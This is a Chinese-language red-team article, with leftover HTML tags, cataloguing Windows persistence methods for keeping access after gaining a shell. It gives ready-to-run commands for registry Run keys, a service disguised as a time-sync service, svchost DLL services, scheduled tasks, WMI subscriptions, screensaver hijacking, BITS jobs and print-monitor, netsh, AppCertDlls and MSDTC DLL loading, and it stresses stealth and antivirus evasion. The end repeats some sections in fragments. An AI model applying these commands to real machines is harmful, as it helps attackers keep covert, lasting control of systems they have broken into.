Windows权限维持技术详解<\/h1>

0x00 前言与场景<\/h2>
在红队行动中，获取shell后需要确保权限持久化。本文整理Windows环境下多种权限维持方法，适用于不同权限级别和场景。<\/p>

0x01 Startup目录<\/h2>

权限要求<\/strong>：普通用户或管理员均可<\/p>

方法<\/strong>：<\/p>

将程序或快捷方式放入以下目录：

当前用户：C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup<\/code><\/li>
所有用户：C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp<\/code><\/li> <\/ul> <\/li> <\/ul> 特点<\/strong>：简单易用，但容易被发现<\/p> 0x02 注册表自启动项<\/h2> 权限要求<\/strong>：普通用户或管理员均可<\/p> 关键注册表项<\/strong>：<\/p> Load键<\/strong>： HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load<\/code><\/p> <\/li> Userinit键<\/strong>： HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit<\/code><\/p> 可添加多个程序，如：userinit.exe,evil.exe<\/code><\/li> <\/ul> <\/li> Explorer\Run键<\/strong>：<\/p> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run<\/code><\/li> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run<\/code><\/li> <\/ul> <\/li> RunServicesOnce键<\/strong>：<\/p> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce<\/code><\/li> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce<\/code><\/li> <\/ul> <\/li> RunServices键<\/strong>：<\/p> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices<\/code><\/li> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices<\/code><\/li> <\/ul> <\/li> RunOnce\Setup键<\/strong>：<\/p> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup<\/code><\/li> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup<\/code><\/li> <\/ul> <\/li> RunOnce键<\/strong>：<\/p> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce<\/code><\/li> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce<\/code><\/li> <\/ul> <\/li> Run键<\/strong>：<\/p> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run<\/code><\/li> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run<\/code><\/li> <\/ul> <\/li> <\/ol> 写入命令<\/strong>：<\/p> reg add "XXXX"<\/span> \/v evil \/t REG_SZ \/d "[Absolute Path]\evil.exe"<\/span> <\/span><\/span><\/code><\/pre>0x03 服务持久化<\/h2> 权限要求<\/strong>：管理员权限（未降权）<\/p> 方法1：直接创建服务<\/h3> sc create evil binpath= "cmd.exe \/k [Absolute Path]evil.exe"<\/span> start= "auto"<\/span> obj= "LocalSystem"<\/span> <\/span><\/span><\/code><\/pre>方法2：通过svchost加载DLL服务<\/h3> 32位系统<\/strong>：<\/p> sc create TimeSync binPath= "C:\Windows\System32\svchost.exe -k netsvr"<\/span> start= auto obj= LocalSystem <\/span><\/span>reg add HKLM\SYSTEM\CurrentControlSet\services\TimeSync\Parameters \/v ServiceDll \/t REG_EXPAND_SZ \/d "C:\Users\hunter\Desktop\localService32.dll"<\/span> \/f \/reg:32 <\/span><\/span>reg add HKLM\SYSTEM\CurrentControlSet\services\TimeSync \/v Description \/t REG_SZ \/d "Windows Time Synchronization Service"<\/span> \/f \/reg:32 <\/span><\/span>reg add HKLM\SYSTEM\CurrentControlSet\services\TimeSync \/v DisplayName \/t REG_SZ \/d "TimeSyncSrv"<\/span> \/f \/reg:32 <\/span><\/span>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"<\/span> \/v netsvr \/t REG_MULTI_SZ \/d TimeSync \/f \/reg:32 <\/span><\/span>sc start TimeSync <\/span><\/span><\/code><\/pre>64位系统注册32位服务<\/strong>：<\/p> sc create TimeSync binPath= "C:\Windows\Syswow64\svchost.exe -k netsvr"<\/span> start= auto obj= LocalSystem <\/span><\/span>[...其余命令与32位相同，但使用\/reg:32...] <\/span><\/span><\/code><\/pre>64位系统<\/strong>：<\/p> [...与32位相同，但使用\/reg:64...] <\/span><\/span><\/code><\/pre>注意<\/strong>：不要覆盖已存在的Svchost键值<\/p> 0x04 计划任务<\/h2> 权限要求<\/strong>：管理员或普通用户<\/p> 基本命令<\/strong>：<\/p> SCHTASKS \/Create \/RU SYSTEM \/SC ONSTART \/RL HIGHEST \/TN \Microsoft\Windows\evil\eviltask \/TR C:\Users\hunter\Desktop\evil.exe <\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p> 可设置多种触发条件（登录、启动、空闲等）<\/li> 命令行功能有限，无法配置高级选项<\/li> 进程由taskeng.exe拉起<\/li> <\/ul> 0x05 WMI事件订阅<\/h2> 权限要求<\/strong>：管理员权限<\/p> 实现步骤<\/strong>：<\/p> wmic \/NAMESPACE:"\\root\subscription"<\/span> PATH __EventFilter CREATE Name="evil"<\/span>, EventNameSpace="root\cimv2"<\/span>,QueryLanguage="WQL"<\/span>, Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 310"<\/span> <\/span><\/span> <\/span><\/span>wmic \/NAMESPACE:"\\root\subscription"<\/span> PATH CommandLineEventConsumer CREATE Name="evilConsumer"<\/span>, ExecutablePath="C:\Users\hunter\Desktop\beacon.exe"<\/span>,CommandLineTemplate="C:\Users\hunter\Desktop\beacon.exe"<\/span> <\/span><\/span> <\/span><\/span>wmic \/NAMESPACE:"\\root\subscription"<\/span> PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"<\/span>evil\""<\/span>, Consumer="CommandLineEventConsumer.Name=\"<\/span>evilConsumer\""<\/span> <\/span><\/span><\/code><\/pre>特点<\/strong>：基于事件触发，隐蔽性较好<\/p> 0x06 屏幕保护程序<\/h2> 权限要求<\/strong>：普通用户<\/p> 注册表设置<\/strong>：<\/p> reg add "hkcu\control panel\desktop"<\/span> \/v SCRNSAVE.EXE \/d C:\Users\hunter\Desktop\beacon.exe \/f <\/span><\/span>reg add "hkcu\control panel\desktop"<\/span> \/v ScreenSaveActive \/d 1 \/f <\/span><\/span>reg add "hkcu\control panel\desktop"<\/span> \/v ScreenSaverIsSecure \/d 0 \/f <\/span><\/span>reg add "hkcu\control panel\desktop"<\/span> \/v ScreenSaveTimeOut \/d 60 \/f <\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p> 最短触发时间60秒<\/li> 由winlogon.exe拉起<\/li> 仅对当前用户有效<\/li> <\/ul> 0x07 后台智能传输服务(BITS)<\/h2> 权限要求<\/strong>：管理员（可绕过UAC）<\/p> 实现步骤<\/strong>：<\/p> bitsadmin \/create evil <\/span><\/span>bitsadmin \/addfile evil "C:\Users\hunter\Desktop\beacon.exe"<\/span> "C:\Users\hunter\Desktop\beacon.exe"<\/span> <\/span><\/span>bitsadmin.exe \/SetNotifyCmdLine evil "C:\Users\hunter\Desktop\beacon.exe"<\/span> NUL <\/span><\/span>bitsadmin \/Resume evil <\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p> 任务默认持续90天<\/li> 由svchost.exe -k netsvcs拉起<\/li> 可绕过常见启动项检查工具<\/li> <\/ul> 0x08 后台打印程序服务<\/h2> 权限要求<\/strong>：管理员权限<\/p> 实现步骤<\/strong>：<\/p> 将恶意DLL放入C:\Windows\System32\<\/code><\/li> 添加注册表项：<\/li> <\/ol> reg add "hklm\system\currentcontrolset\control\print\monitors\monitor"<\/span> \/v "Driver"<\/span> \/d "monitor.dll"<\/span> \/t REG_SZ <\/span><\/span><\/code><\/pre>特点<\/strong>：DLL被加载到spoolsv.exe进程，隐蔽性强<\/p> 0x09 Netsh Helper DLL<\/h2> 权限要求<\/strong>：管理员权限<\/p> 实现步骤<\/strong>：<\/p> netsh add helper [Absolute evil DLL path] <\/span><\/span>reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"<\/span> \/v Pentestlab \/t REG_SZ \/d "cmd \/c C:\Windows\System32\netsh"<\/span> <\/span><\/span><\/code><\/pre>特点<\/strong>：DLL被netsh加载，隐蔽性较强<\/p> 0x0A AppCertDlls注册表项<\/h2> 权限要求<\/strong>：管理员权限<\/p> 原理<\/strong>：当进程调用CreateProcess等API时，会加载该注册表项指定的DLL<\/p> 注册表路径<\/strong>： HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls<\/code><\/p> 特点<\/strong>：隐蔽性高，但需自定义DLL避免阻塞<\/p> 0x0B MSDTC服务<\/h2> 权限要求<\/strong>：管理员权限<\/p> 实现步骤<\/strong>：<\/p> 在System32下放置恶意oci.dll<\/li> 设置服务自启：<\/li> <\/ol> sc qc msdtc <\/span><\/span>sc config msdtc start= auto <\/span><\/span><\/code><\/pre>特点<\/strong>：DLL被加载到msdtc.exe进程，隐蔽性强<\/p> 总结<\/h2> 用户层持久化需借助Windows自带功能实现隐蔽<\/li> 不同方法适用于不同权限级别和场景<\/li> 建议准备多种方法互为备份<\/li> 实际应用中需自定义DLL实现免杀和稳定性<\/li> <\/ol> 推荐组合<\/strong>：<\/p> 普通用户：Startup目录 + 屏幕保护 + AppCertDlls<\/li> 管理员：服务 + WMI + BITS + 打印服务<\/li> <\/ul>

Windows权限维持技术详解<\/h1>

0x00 前言与场景<\/h2> 在红队行动中，获取shell后需要确保权限持久化。本文整理Windows环境下多种权限维持方法，适用于不同权限级别和场景。<\/p>

0x03 服务持久化<\/h2> 权限要求<\/strong>：管理员权限（未降权）<\/p>

0x00 前言与场景<\/h2>
在红队行动中，获取shell后需要确保权限持久化。本文整理Windows环境下多种权限维持方法，适用于不同权限级别和场景。<\/p>

0x03 服务持久化<\/h2>
权限要求<\/strong>：管理员权限（未降权）<\/p>